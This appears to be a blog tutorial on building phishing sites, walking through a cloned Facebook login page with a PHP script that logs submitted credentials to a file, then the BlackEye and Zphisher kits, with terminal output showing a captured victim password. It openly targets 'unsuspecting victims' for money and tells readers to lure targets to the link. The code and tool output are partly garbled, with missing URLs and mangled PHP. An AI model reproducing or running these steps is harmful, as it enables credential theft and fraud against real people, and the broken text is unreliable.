How to Create a Phishing Website

How to Create a Phishing Website

The first height to attain in the journey of being to be a good hacker is learning how to create phishing websites. Sadly, getting the services of a good web developer to handle this job is not a wise decision as he may leave certain loopholes to retain access to the site still.

He may also be aware of the website’s intended use and may decide to monitor your online activity by installing viruses.

So learning to get the job done personally should be the responsibility of the potential hacker to avoid compromise of the process and further lose money from unsuspecting victims.

Instead of creating a fake Facebook account, you can create a phishing website and hack people’s account with ease.

What is Phishing?

Phishing refers to a cyber attack that employs deceptive websites and emails to get personal information about people’s access to their online activity. This is made possible by sending phishing emails or web pages and compel them to open the sent link.

Several ways are available in learning how to create a phishing website, but there are factors to consider before proceeding to create your website. The tools used for phishing are;

  • Mobile Phone
  • PC

Requirements to Create a Phishing Website

The prerequisite Knowledge needed to create a phishing website is;

How to Create a Phishing Website With 000webhost Using an Android Phone

Creating a phishing website with your 000webhost is the basic way to simple phishing sites. A PC is good to go for this purpose, but it can also be done using smartphones like Android or iPhone devices. Good RAM storage is also needed with a minimum memory of 3GB.

With many people using phones to learn to phish, there’s a need to teach how to use a phone in creating phishing sites.

To create a phishing site with an android device, you should follow these steps;

  • Download Naked Browser LTS from the android play store.
  • Visit
  • Swipe your screen to the left and code.

Now, at, the source code will display. You should follow the next steps.

create phishing website with Facebook source code

Clicking on the page source allows you to see the raw HTML code of the webpage.

  • Download FX file manager.
  • Open the app and media card.
  • Tape on the options button at the top screen and open it.
  • Click file, click text.
  • Now name the file as index.html.
  • Paste the Facebook HTML source code.

The next step is to convert the index.html file to Unicode using Microsoft edge or windows explorer on PC and create the Password PHP File.

The next step is to create a phishing page for any website. This is where all Facebook account login will go for phishing to be successful. If there’s no prior knowledge of programming, copy these codes.


 Header (‘Location: ‘);

$handle = fopen(“log.txt”, “a”);

 Foreach($_POST as $variable => $value) {

Fwrite($handle, $variable);

Fwrite($handle, “=”);

 Fwrite($handle, $value);

 Fwrite($handle, “Ir\n”);


 Fwrite($handle, “Ir\n|n|n|n”);


Exit; ?


Next, create a new .txt file using Android. The file name should be stored as post.php, and integrate PHP keyword picker in HTML by, to do this, download a PC keyboard for android. The next thing to do is to host the PHP file online with a hosting site like 000.webhost, and also host the phishing webpage.

Click here to host a Website for a cheap Amount

The phishing webpage should be hosted online for it to work. To do this;

  • The login form should be located in the index.html file.
  • Then replace the “post.php” with http://yourwebsiteforyourpostphpupload/post.php

Test the Phishing Website

With the Facebook phishing website created, login with any Facebook login detail, it will be redirected to if done correctly. Otherwise there may be issues with the code and this should be rectified. If the login is successful, go to the FTP server a log.txt file will be displayed. Open the log.txt file and the login details will be displayed

How to Create Phishing Website With a Phone

This method is easy as it requires just a phone and a BlabkEye application. This app supports 32 phishing websites including Facebook, Google, Twitter, Adobe, PayPal, MySpace, Shopify, GitHub, etc. To do this, it is required to download BlabkEye and clone the GitHub repository source. To correctly clone the source, you will need to input the command codes by opening the window terminal as shown below.

~ git clone


Cloning into black eye

remote: Enumerating objects: 361 done.

remote: Total 361 (delta 0), reused 0 (dckich view source lta 0), pack-reused 361

Receiving objects: 100% (361/361), 8.o1 MiB/s, done.

Resolving details: 100% (101/101), done.

~$ CD blackeye


The above syntax will install and activate the BlackEye repository. To see the codes, you will go to the blackeye folder and run the command bash

You should copy the code below;

~/blackeye$ bash : Disclaimer: Developers assume no liability and are not for any misuse or damage caused by BlackEye. : educational purporses!! :: Attacking targets without mutual consent is illegal! [17] IGFollowers [33] Custom BLACKEYE v1.1[02] Facebook eBay[03] Snapchat Twitter : responsible :: :: Only use for :: [01] Instagram [18] [19] Pinterest[04] [20] CryptoCurrency[05] [21] Verizon[06] Google [23] Adobe [24] Shopify[09] [25] Messenger[10] [26] GitLab[11] Steam [28] [29] Github [22] DropBox[07] Spotify ID[08] Netflix PayPal Origin [27] Twitch[12] Yahoo MySpace[13] Linkedin Badoo[14] Protonmail [30] VK[15] WordPress [31] Yandex[16] [32] devianART Microsoft Modify Page Pasaet 37 Lug in reate a new account s quick and eusy. Back Alt+Left Arrow Hst name Sumame Forward All+Right Anw Heload Ctri-R Mobike numbus or ermail adtiues.

Modify the Facebook login page, right click and view the page’s source code. As seen below.

create phishing website with Facebook source code

Clicking on the page source allows you to see the raw HTML code of the webpage. will display lapsed copyright notes. In case you don’t like this process, return to the blackeye organizer from the bash script and sort Is. Writing Is will display the locales envelope within the BlackEye store. the BlackEye repository. 

~ / blackeye $ Is LICENSE

With the cd sites command in place, navigate through the sites folder and it will be revealed by typing Is command. Then choose the site’s template to the phishing modification. Facebook is the center of focus for this article.

 ~ / blackeye $ cd sites ~ / blackeye / sites $ Is adobe cryptocurrency facebook google paypal shopify spotify twitter wordpressbado0 devianart instafollowers messenger netflix pinterest shopping steam verizon yahoocreate dropbox instagram protonmail snapchat twitch vk yandex linkedin myspace github gitlab microsoft origin.

In order to edit Facebook, re-enter Is to get access to the files, a display similar to the one below should pop up.

~ / blackeye / sites $ cd

 facebook- / blackeye / sites / facebook $

Is index_files index.php ip.php ip.txt login.html login.php

saved.ip.txt saved. usernames.txt

Now, using a text editor, edit the source code of and proceed to build phishing code by following the steps below.

  • Launch a new terminal window.
  • Navigate to the back eye folder.
  • Go back to the selection menu of the phishing webpage displaying a list of phishing websites.
  • Select the source code for Facebook and proceed.
~ blackeye / sites / protonmail $ cd ~ $ cd blackeye ~ / blackeye $ bash [01] Instagram IGFollowers [33] Custom v1.1 [02] Facebook Snapchat Twitter [17] BLACKEYE [18] eBay [03] [19] Pinterest [04] [20] CryptoCurrency [05] [21] Verizon [06] Google Github [22] DropBox [07] Spotify ID [08] Netflix PayPal Origin [27] Twitch [12] Yahoo MySpace [13] Linkedin Badoo [14] Protonmail [30] VK [15] [23] Adobe [24] Shopify [09] [25] Messenger [10] [26] GitLab [11] Steam [28] [29] WordPress [31] Yandex [16] [32] devianART [*] Choose Microsoft an option: 18

Input the IP address as requested by the terminal and press enter.You should see something similar to the codes below.

[*] Put your local IP (Default

[*] Starting php server …

[*] Send this link to the Victim:

[*] Waiting victim open the link …

After these, go to to view the phishing set up result, and send the link to unsuspecting targets and convince them to click it.

[*]Waiting victim open the link ..

[*] IP Found!

[*] Victim IP:

[*] User-Agent: User-Agent: Mozilla / 5.0 (X11; Linux x86_64; rv: 60.0)

Gecko / 20100101

Firefox / 60.0 [*] Saved:

shopping / saved.ip.txt

If the target opens the link to open, BlackEye reports the password and username of the victim as seen below.

[*] Waiting credentials …

 [*] Credentials Found!

[*] Account: inwizzy

[*] Password: Forever-2021

[*] Saved: sites / shopping / saved.usernames.

This may not work for targets using Facebook 2FA security.

How to Create a Phishing Webpage in Minutes

A good tool for creating a phishing page in minutes is the Zphisher tools which sends the potential victim a link to steal personal login details. The environment create them are;

  • OS: Kali Linux 2019.3 64 bit
  • Kernel-Version: 5.2.0

To run the installation, use command to clone the project,

Git clone

root@kali:/home/iicybersecurity# git clone

 Cloning into ‘zphisher’…

 remote: Enumerating objects: 39, done.

 remote: Counting objects: 100% (39/39), done.

 remote: Compressing objects: 100% (38/38), done.

 remote: Total 873 (delta 17), reused 2 (delta 0), pack-reused 834

 Receiving objects: 100% (873/873), 9.69 MiB | 1.28 MiB/s, done.

 Resolving deltas: 100% (346/346), done.

Next use the cd command to enter into zphisher directory

cd zphisher

root@kali:/home/iicybersecurity# cd zphisher/


Now, use the command to lunch the tool


Here, we see 29 phishing modules, let’s use top four module.

Zphisher to create phishing website
Zphisher Tool


Creating a phishing website is a basic knowledge to have handy in order to become an ethical hacker. The phishing webpage can be used on different social media sites and other sites to obtain personal login details of clients. Stay happy phishing.

Leave a Reply

Your email address will not be published

three × 3 =